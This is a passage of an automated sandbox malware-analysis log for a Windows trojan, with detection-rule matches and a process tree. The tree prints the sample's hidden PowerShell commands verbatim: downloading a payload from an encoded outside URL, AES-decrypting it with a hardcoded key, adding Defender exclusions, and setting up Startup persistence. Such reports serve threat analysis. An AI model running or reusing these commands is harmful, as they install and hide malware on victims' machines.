                    Source: C:\Windows\explorer.exeCode function: 18_2_023581A018_2_023581A0
                    Source: C:\Windows\explorer.exeCode function: 18_2_0238A67418_2_0238A674
                    Source: C:\Windows\explorer.exeCode function: 18_2_0238D6B818_2_0238D6B8
                    Source: C:\Windows\explorer.exeCode function: 18_2_022CA7A018_2_022CA7A0
                    Source: C:\Windows\explorer.exeCode function: 18_2_0234A41018_2_0234A410
                    Source: C:\Windows\explorer.exeCode function: 18_2_0238148018_2_02381480
                    Source: C:\Windows\explorer.exeCode function: 18_2_023684C018_2_023684C0
                    Source: C:\Windows\explorer.exeCode function: 18_2_0234651018_2_02346510
                    Source: C:\Windows\explorer.exeCode function: 18_2_022F05A018_2_022F05A0
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C55D018_2_022C55D0
                    Source: C:\Windows\explorer.exeCode function: 18_2_02381A9018_2_02381A90
                    Source: C:\Windows\explorer.exeCode function: 18_2_0238AAF418_2_0238AAF4
                    Source: C:\Windows\explorer.exeCode function: 18_2_0235282A18_2_0235282A
                    Source: C:\Windows\explorer.exeCode function: 18_2_0238B84C18_2_0238B84C
                    Source: C:\Windows\explorer.exeCode function: 18_2_0238090018_2_02380900
                    Source: C:\Windows\explorer.exeCode function: 18_2_022C5E1018_2_022C5E10
                    Source: C:\Windows\explorer.exeCode function: 18_2_0235FE7018_2_0235FE70
                    Source: C:\Windows\explorer.exeCode function: 18_2_02383EB018_2_02383EB0
                    Source: C:\Windows\explorer.exeCode function: 18_2_022F3EC018_2_022F3EC0
                    Source: C:\Windows\explorer.exeCode function: 18_2_0234EEC018_2_0234EEC0
                    Source: C:\Windows\explorer.exeCode function: 18_2_022CAF0018_2_022CAF00
                    Source: C:\Windows\explorer.exeCode function: 18_2_02351F8F18_2_02351F8F
                    Source: C:\Windows\explorer.exeCode function: 18_2_02380FC018_2_02380FC0
                    Source: C:\Windows\explorer.exeCode function: 18_2_022DDC5018_2_022DDC50
                    Source: C:\Windows\explorer.exeCode function: 18_2_02384D9418_2_02384D94
                    Source: C:\Windows\explorer.exeCode function: 18_2_0237FDF018_2_0237FDF0
                    Source: C:\Windows\explorer.exeCode function: 18_2_02385DF018_2_02385DF0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_00007FF66CCC157019_2_00007FF66CCC1570
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_00007FF66CCDAE1419_2_00007FF66CCDAE14
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_00007FF66CCC5D6019_2_00007FF66CCC5D60
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_00007FF66CCD969019_2_00007FF66CCD9690
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_00007FF66CCD365019_2_00007FF66CCD3650
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_00007FF66CCEC67019_2_00007FF66CCEC670
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_00007FF66CCF001019_2_00007FF66CCF0010
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_00007FF66CCEBFA019_2_00007FF66CCEBFA0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_00007FF66CCC4F4019_2_00007FF66CCC4F40
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_00007FF66CCD4F3B19_2_00007FF66CCD4F3B
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_00007FF66CCC31F019_2_00007FF66CCC31F0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_00007FF66CCC999019_2_00007FF66CCC9990
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_00007FF66CCD293819_2_00007FF66CCD2938
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_00007FF66CCCEB3019_2_00007FF66CCCEB30
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_00007FF66CCCC24019_2_00007FF66CCCC240
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_00007FF66CCC83C119_2_00007FF66CCC83C1
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_00007FF66CCD452019_2_00007FF66CCD4520
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_00007FF66CCE544019_2_00007FF66CCE5440
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_00007FF66CCE146019_2_00007FF66CCE1460
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_0000016DE6BC85B919_2_0000016DE6BC85B9
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_0000016DE6BC7DAD19_2_0000016DE6BC7DAD
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_0000016DE6BC906D19_2_0000016DE6BC906D
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_0000016DE6BC818919_2_0000016DE6BC8189
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_0000016DE6BC6ED119_2_0000016DE6BC6ED1
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 19_2_0000016DE86C336019_2_0000016DE86C3360
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 31_2_000001677ADB85B931_2_000001677ADB85B9
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 31_2_000001677ADB7DAD31_2_000001677ADB7DAD
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 31_2_000001677ADB6ED131_2_000001677ADB6ED1
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 31_2_000001677ADB906D31_2_000001677ADB906D
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 31_2_000001677ADB818931_2_000001677ADB8189
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: 31_2_000001677C7E336031_2_000001677C7E3360
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\asrjskwdsdoc.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                    Source: C:\Windows\explorer.exeCode function: String function: 022F3030 appears 48 times
                    Source: C:\Windows\explorer.exeCode function: String function: 00E28378 appears 48 times
                    Source: C:\Windows\explorer.exeCode function: String function: 022D5C20 appears 59 times
                    Source: C:\Windows\explorer.exeCode function: String function: 02313CE0 appears 137 times
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeCode function: String function: 00007FF66CCC37E0 appears 70 times
                    Source: 13.2.downloaded_file.exe.300000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.powershell.exe.29e75ee9280.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.downloaded_file.exe.fedfd8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 16.2.explorer.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.powershell.exe.29e75e6b438.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.powershell.exe.29e75e6b438.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 18.2.explorer.exe.22c0000.0.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                    Source: 13.0.downloaded_file.exe.300000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.powershell.exe.29e75ee9280.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.downloaded_file.exe.fedfd8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000013.00000002.2047760821.0000016DE66D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 0000001F.00000002.2065498416.000001677AB40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 00000013.00000002.2048053802.0000016DE6950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 0000001F.00000002.2064926837.000001677A63A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 00000013.00000002.2047498175.0000016DE6452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 0000001F.00000002.2065257681.000001677A8C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: Process Memory Space: powershell.exe PID: 7216, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 7644, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.mine.winEXE@59/22@2/4
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_0031CA00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,13_2_0031CA00
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCode function: 13_2_00312AB0 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoUninitialize,13_2_00312AB0
                    Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.batJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeMutant created: \Sessions\1\BaseNamedObjects\{7E105FD4-6112-4FB9-A722-91E984087449}
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeMutant created: \Sessions\1\BaseNamedObjects\{16875766-AD57-416F-8330-F0B6BCC3AFF1}
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeMutant created: \Sessions\1\BaseNamedObjects\{D3378A42-4880-48C8-9826-A27CECC41889}
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4464:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeMutant created: \Sessions\1\BaseNamedObjects\{8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4168:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\295B.tmpJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeProcess created: C:\Windows\explorer.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\explorer.exe
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeProcess created: C:\Windows\explorer.exeJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\explorer.exe
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCommand line argument: %s\explorer.exe13_2_00301000
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCommand line argument: %s\svchost.exe13_2_00301000
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeCommand line argument: %s\cmd.exe13_2_00301000
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: explorer.exe, explorer.exe, 00000012.00000002.2675679340.00000000023A8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: explorer.exe, explorer.exe, 00000012.00000002.2675679340.00000000023A8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: explorer.exe, explorer.exe, 00000012.00000002.2675679340.00000000023A8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: explorer.exe, 00000010.00000002.2934846757.0000000003930000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2015791571.00000000035FA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2675679340.00000000023A8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: explorer.exe, 00000012.00000003.2016856593.0000000002757000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2017112482.00000000008F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2017151466.0000000002766000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: file.exeReversingLabs: Detection: 34%
                    Source: file.exeVirustotal: Detection: 44%
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeFile read: C:\Users\user\AppData\Local\Temp\downloaded_file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net session
                    Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$key = [System.Text.Encoding]::UTF8.GetBytes('blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9');" "$iv = [System.Text.Encoding]::UTF8.GetBytes('5t9nsUPo0cA/tUjH');" "$aes = [System.Security.Cryptography.Aes]::Create();" "$aes.Key = $key; $aes.IV = $iv;" "$decryptor = $aes.CreateDecryptor();" "$inputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin';" "$encryptedBytes = [System.IO.File]::ReadAllBytes($inputFile);" "$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length);" "$outputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.exe';" "[System.IO.File]::WriteAllBytes($outputFile, $decryptedBytes);"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\downloaded_file.exe "C:\Users\user\AppData\Local\Temp\downloaded_file.exe"
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}
                    Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" ""
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                    Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                    Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\explorer.exe explorer.exe
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe"
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                    Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net sessionJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$key = [System.Text.Encoding]::UTF8.GetBytes('blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9');" "$iv = [System.Text.Encoding]::UTF8.GetBytes('5t9nsUPo0cA/tUjH');" "$aes = [System.Security.Cryptography.Aes]::Create();" "$aes.Key = $key; $aes.IV = $iv;" "$decryptor = $aes.CreateDecryptor();" "$inputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin';" "$encryptedBytes = [System.IO.File]::ReadAllBytes($inputFile);" "$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length);" "$outputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.exe';" "[System.IO.File]::WriteAllBytes($outputFile, $decryptedBytes);"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\downloaded_file.exe "C:\Users\user\AppData\Local\Temp\downloaded_file.exe" Jump to behavior
                    Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 sessionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'Jump to behavior
